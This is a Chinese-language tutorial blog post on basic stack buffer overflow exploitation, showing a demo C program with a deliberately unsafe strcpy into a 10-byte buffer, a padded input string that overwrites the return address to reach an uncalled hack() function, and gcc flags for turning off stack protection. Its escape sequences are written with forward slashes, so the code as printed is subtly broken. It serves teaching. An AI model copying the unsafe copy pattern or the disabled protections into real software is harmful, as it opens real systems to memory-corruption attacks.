简单栈溢出利用

#include<stdlib.h>
#include<string.h>
void fun(char *name){
    char buf[10];
    strcpy(buf,name);
    printf("%s/n",buf);
}
void hack(){
    printf("flag/n");
}
int main(){
    char name[]="Alex@bbb";
    fun(name);
    return 0;
}

上面的程序是一个正常的C语言程序,但是main函数中没有调用hack()函数,下面我就演示下如何利用缓冲区溢出来执行hack函数的内容。

使用codeblocks编译并执行上述程序后,拖入od查看栈的变化情况,看看给变量name赋什么值的时候,会恰好覆盖掉call fun处的函数返回地址

简单栈溢出利用

F7跟进  F8 一句一句执行:

简单栈溢出利用

简单栈溢出利用

因此我们添加poc:

#include<stdlib.h>
#include<string.h>
void fun(char *name){
    char buf[10];
    strcpy(buf,name);
    printf("%s/n",buf);
}
void hack(){
    printf("flag/n");
}
int main(){
    char name[]="Alex@bbbaaaaaaaaaaaaaa/x59/x13/x40/00"; //这里后边四个为hack()函数地址
    fun(name);
    return 0;
}

重新编译执行后,我们发现利用成功:

 简单栈溢出利用

在使用ubuntu复现栈溢出的时候需要关闭栈保护机制:

    使用gcc编译时全部关闭保护机制,参数-fno-stack-protector用来关闭gcc编译器gs验证码机制,

    -z execstack用来关闭ld链接器堆栈段不可执行机制。

这里有一个linux下64位的栈溢出过程。

https://www.secpulse.com/archives/32328.html 

原创文章,作者:3628473679,如若转载,请注明出处:https://blog.ytso.com/219674.html

(0)
上一篇 2022年1月2日
下一篇 2022年1月2日

相关推荐

发表回复

登录后才能评论